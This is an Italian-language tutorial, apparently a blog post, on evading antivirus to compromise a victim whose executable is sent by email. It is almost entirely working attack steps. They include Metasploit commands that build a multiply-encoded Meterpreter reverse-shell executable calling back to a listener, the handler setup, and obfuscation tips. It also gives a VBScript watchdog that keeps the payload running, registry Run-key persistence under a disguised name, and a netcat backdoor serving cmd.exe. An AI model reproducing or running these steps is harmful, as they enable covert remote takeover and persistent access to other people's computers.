Questo articolo descrive la tecnica che gli hackers utilizzano per bypassare qualsiasi tipo di antivirus.
Il risultato finale sarà un file (in questo caso) eseguibile che sarà spedito via mail al malcapitato.

Step 1)

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.15 LPORT=443 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /root/test.exe

Step 2)

msfconsole

Step 3)

use multi/handler

Step 4)

set payload windows/meterpreter/reverse_tcp

Step 5)

set lport 443

Step 6)

set lhost 192.168.0.15

Step 7)

exploit

Step 8)

Use Xenocode Postbuild for .NET for obfuscate the code

Step 9)

Use Hex Edit to fill up the dangerous syscall

Step 10) MANTAIN ACCESS

mkdir to create remote directory

Step 11)

Inject 2 files into the directory -> test.exe ( a daemon process ) and a persist.vbs like this :

state = 1
While state = 1
Set WshShell = WScript.CreateObject ("WScript.Shell")
Set colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")
For Each objProcess in colProcessList
if objProcess.name = "test.exe" then
vFound = True
End if
Next
If vFound = True then
wscript.sleep 5000
Else
WshShell.Run ("C:\<path were you deployed the files>\\test.exe")
wscript.sleep 5000
End If
vFound = False
Wend

Step 12)

Enumerate a remote key registry

reg enumkey -K HKLM\\Software\\Microsoft\\Windows\\Currentversion\\Run (or in HKCU\Software\\Microsoft\\Windows\\Currentversion\\Run)

Step 13)

Put the new one into the registry

reg setval -k HKLM(HKCU)\\Software\\Microsoft\\Windows\\Currentversion\\Run -v Windows Live -d "C:\path\test.exe"

If you want to use netcat :

C:\\path\\nc.exe -L -d -p 443 e cmd.exe"

Step 14)

ENJOY :-)

GAME OVER !

Luca